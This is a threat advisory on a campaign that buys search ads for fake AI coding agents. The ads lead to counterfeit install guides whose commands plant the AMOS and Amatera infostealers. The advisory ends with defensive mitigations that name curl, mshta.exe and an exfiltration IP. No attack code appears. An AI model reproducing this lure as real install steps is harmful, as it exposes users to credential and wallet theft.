This threat involves malicious campaigns where threat actors advertise fake AI agents—Claude Code, Doubao, and OpenClaw—via Google Search ads to lure users into installing infostealer malware. When users search for these AI tools, sponsored ads lead them to counterfeit documentation pages that closely mimic legitimate installation guides. These pages are hosted on reputable platforms like Squarespace, helping them evade anti-phishing detection. The installation instructions prompt users to execute commands that deploy malware instead of genuine AI software. On macOS, the malware deployed is AMOS, a spyware infostealer previously documented by Kaspersky, which steals sensitive data. On Windows, the Amatera infostealer is installed using the mshta.exe utility, harvesting browser data, cryptocurrency wallet information, and user folder contents, then exfiltrating it to a remote server. This attack exploits the rising popularity of AI assistants and workflow automation tools in corporate environments, especially targeting employees who seek unauthorized access to these tools outside official channels. The campaign is a variant of the ClickFix/InstallFix attack pattern, using social engineering and trusted infrastructure to bypass security controls. Although no known exploits are currently widespread, the threat poses a medium severity risk due to its potential to compromise corporate secrets and user credentials. Mitigation requires a combination of user awareness training, endpoint security solutions, and policies restricting unauthorized AI tool usage.

The impact of this threat is significant for organizations globally, particularly those with employees who actively seek AI assistants and workflow automation tools independently. Successful exploitation results in the installation of infostealer malware that compromises confidentiality by harvesting browser credentials, cryptocurrency wallets, and sensitive corporate files. This can lead to data breaches, intellectual property theft, financial losses, and reputational damage. The integrity of corporate projects may be undermined if source code or proprietary information is exfiltrated. Availability is less directly affected, but the presence of malware can degrade system performance and increase incident response costs. The attack leverages social engineering and trusted platforms, increasing the likelihood of successful infection. Organizations with lax controls on software installation or insufficient employee training are at higher risk. The threat also highlights risks associated with shadow IT and unauthorized use of AI tools, which can create new attack vectors. Although no active widespread exploitation is reported, the evolving nature of these campaigns suggests a growing threat landscape.

1. Implement comprehensive security awareness training focused on the risks of downloading and installing unauthorized AI tools, emphasizing the dangers of following instructions from unverified sources or ads. 2. Enforce strict application whitelisting and endpoint protection policies that prevent execution of unauthorized scripts or commands, especially those involving curl or mshta.exe utilities. 3. Monitor and restrict employee access to AI assistants and workflow automation tools, providing approved alternatives and official channels to reduce shadow IT usage. 4. Deploy advanced threat detection solutions capable of identifying infostealer behaviors, such as unusual data exfiltration or suspicious command execution patterns. 5. Regularly audit and monitor network traffic for connections to known malicious IP addresses, such as the one used by Amatera (144.124.235.102). 6. Use multi-factor authentication and strong credential management to limit the impact of stolen browser and crypto-wallet data. 7. Collaborate with security vendors to stay updated on emerging threats related to AI tool exploitation and incorporate threat intelligence into security operations. 8. Educate employees on verifying URLs and recognizing legitimate documentation sites, especially when searching for new software tools. 9. Consider deploying browser security extensions or DNS filtering to block access to known malicious domains or phishing sites. 10. Establish incident response procedures specifically addressing malware infections originating from social engineering campaigns involving AI tools.